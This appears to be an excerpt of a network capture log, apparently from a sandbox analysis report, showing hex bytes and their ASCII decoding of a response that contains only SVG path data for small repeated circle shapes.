                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1043INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: <path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1059INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1075INData Raw: 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1091INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1107INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1123INData Raw: 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39
                                                                                                                                                                                                                                                                          Data Ascii: 7,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1139INData Raw: 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: .87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1156INData Raw: 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1172INData Raw: 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: .93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1188INData Raw: 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 35 2e 31 31 2c 32 34 39 2e 37 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.18,3.32"/><path class="cls-9" d="M325.11,249.73a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1204INData Raw: 22 20 64 3d 22 4d 33 35 39 2e 35 37 2c 32 39 37 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: " d="M359.57,297.08a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1220INData Raw: 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 37 37 2c 33 33 36 2e 33 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: .6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M393.77,336.36a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1236INData Raw: 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f
                                                                                                                                                                                                                                                                          Data Ascii: 2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1252INData Raw: 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 35 37 2c 31 39 37 2e 30 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: .05,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M446.57,197.09a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1268INData Raw: 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 37 36 2c 32 33 36 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: .59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M480.76,236.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1284INData Raw: 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1300INData Raw: 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 34 32 2c 33 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.18,3.33"/><path class="cls-9" d="M549.42,323a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8
